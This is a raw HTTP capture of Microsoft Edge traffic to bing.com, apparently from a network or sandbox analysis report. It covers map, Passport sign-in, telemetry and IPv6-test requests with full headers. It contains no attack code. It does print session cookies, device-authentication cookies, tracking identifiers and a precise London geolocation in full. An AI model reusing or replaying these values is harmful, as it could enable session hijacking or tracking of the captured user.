report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10bf9
GET

https://www.bing.com/maps/mapcontrol/v9/style?styleid=road&uid=22989428392729&og=2578&lang=en-GB&mkt=en-GB&ur=gb&stlversion=9.33&rm=0&hcm=none&partner=serp&branch=experimental

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /maps/mapcontrol/v9/style?styleid=road&uid=22989428392729&og=2578&lang=en-GB&mkt=en-GB&ur=gb&stlversion=9.33&rm=0&hcm=none&partner=serp&branch=experimental HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: mapc=rm=0
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693

Response

HTTP/2.0 200

cache-control: private
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a1063b7454ab193c5517ff36042
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-8gupPnbaMcfJ0XpdpZj9fPGaSBHJCrdnKuYwnjZP7LY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 7A8186B60DBC495FA368F62C20074F99 Ref B: LON212050703021 Ref C: 2024-12-04T10:08:16Z
date: Wed, 04 Dec 2024 10:08:16 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:16 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10be6
GET

https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /secure/Passport.aspx?popup=1&ssl=1 HTTP/2.0
host: www.bing.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: DIDC=ct%3D1733306896%26hashalg%3DSHA256%26bver%3D40%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C522_BL2.0.D.CqMHPHFUkHlpNT5YNkMaDAXfn3/JNWq/daTcdxKlca78Eq/U5dBnXK4B6xoSao8yuHW/3swE393S7UTNF/WEoofmkXL15wZ18qx4/394ER5zrzGWi30CPaoAw40LjHRtYUbTMB/Cbc6%252BZEJHE4GTC62dulE45etTfYguKe3QTQvjrUX5ggZZUzLKupCVbROoMStjJvgTNp0ZxE1Prgj1Lg2MPYLAAnsuubtqo42SxYfHG2jxBZY9KgkHvbz1BfdaLe8cjPrmW9OvoP0Dn6v4YRF%252BPb%252BP1dFwun9Y%252Bd89PG3%252B2%252B23UhjipTkeyqsTdibp1Uz/2QPF3uklRM81tlWW3caj3RuI45fMWxA%252BXVDosqkogaGJQKHs7aSxNx6bfxv46CZI2T36rEAn3fSXbsq80sZh8dw8mHzuF%252BrEmXJ2nQps6NM2j/F2aQ0vOx6DBxVvnj4rNk6LGnlgt0oO83YeDlMKFRIaiprqAv4fdh7iNbWeBcbP2%252BGMn8%252BtSmXapnaZIq1tkVFtuQSdIsm3FB%252BjJrM%253D%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3DtBCYJZ1hHHXuwJED6f1e8dydE04IKRzg%26hash%3DqCtf7tfmhABC0fwCralnFJmBviokWom2CfW5ybfg3do%253D%26dd%3D1
cookie: DIDCL=ct%3D1733306896%26hashalg%3DSHA256%26bver%3D40%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C522_BL2.0.D.CqMHPHFUkHlpNT5YNkMaDAXfn3/JNWq/daTcdxKlca78Eq/U5dBnXK4B6xoSao8yuHW/3swE393S7UTNF/WEoofmkXL15wZ18qx4/394ER5zrzGWi30CPaoAw40LjHRtYUbTMB/Cbc6%252BZEJHE4GTC62dulE45etTfYguKe3QTQvjrUX5ggZZUzLKupCVbROoMStjJvgTNp0ZxE1Prgj1Lg2MPYLAAnsuubtqo42SxYfHG2jxBZY9KgkHvbz1BfdaLe8cjPrmW9OvoP0Dn6v4YRF%252BPb%252BP1dFwun9Y%252Bd89PG3%252B2%252B23UhjipTkeyqsTdibp1Uz/2QPF3uklRM81tlWW3caj3RuI45fMWxA%252BXVDosqkogaGJQKHs7aSxNx6bfxv46CZI2T36rEAn3fSXbsq80sZh8dw8mHzuF%252BrEmXJ2nQps6NM2j/F2aQ0vOx6DBxVvnj4rNk6LGnlgt0oO83YeDlMKFRIaiprqAv4fdh7iNbWeBcbP2%252BGMn8%252BtSmXapnaZIq1tkVFtuQSdIsm3FB%252BjJrM%253D%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3DtBCYJZ1hHHXuwJED6f1e8dydE04IKRzg%26hash%3DqCtf7tfmhABC0fwCralnFJmBviokWom2CfW5ybfg3do%253D%26dd%3D1
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693

Response

HTTP/2.0 200

cache-control: no-cache,no-store
pragma: no-cache
content-length: 235
content-type: text/html; charset=utf-8
content-encoding: br
expires: Thu, 01 Jan 1970 00:00:00 GMT
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a1085fb44b2b4dafc7b83b39e4d
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-s6mxeRnbJu/daTAkLC1BKZQgbqzsYkMy+mjIMYyBvsc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: B557FC77B4444726A84DD16C4A248729 Ref B: LON212050703025 Ref C: 2024-12-04T10:08:16Z
date: Wed, 04 Dec 2024 10:08:16 GMT
set-cookie: .MSA.Auth=; expires=Thu, 01 Jan 1970 00:00:00 GMT; domain=.bing.com; path=/; secure; samesite=lax; httponly
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:16 GMT; path=/; HttpOnly
set-cookie: DIDC=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: DIDC=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: DIDCL=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: DIDCL=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10d0f
GET

https://www.bing.com/maps/instrumentation?version=V9&q=&feature=omo

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /maps/instrumentation?version=V9&q=&feature=omo HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: mapc=rm=0
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693

Response

HTTP/2.0 200

content-length: 8292
content-type: text/html; charset=utf-8
access-control-allow-origin: *
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a1034934eddbf8a96ec11fb6255
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-frame-options: DENY
content-security-policy-report-only: script-src 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-q7czUrAWS0Aii8ZjFrRLHFqyIvyACWA2C4/4JtEqHts='; base-uri 'self'; report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
ig: 9E56AE43171149329028FBD2D9BD4FFF
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10f01
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 291
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306897.7f11157
GET

https://www.bing.com/ipv6test/test?FORM=MONITR

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /ipv6test/test?FORM=MONITR HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693

Response

HTTP/2.0 200

content-length: 64
content-type: text/html; charset=utf-8
access-control-allow-origin: https://www.bing.com
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a1142374dd1b9811672d4d540b3
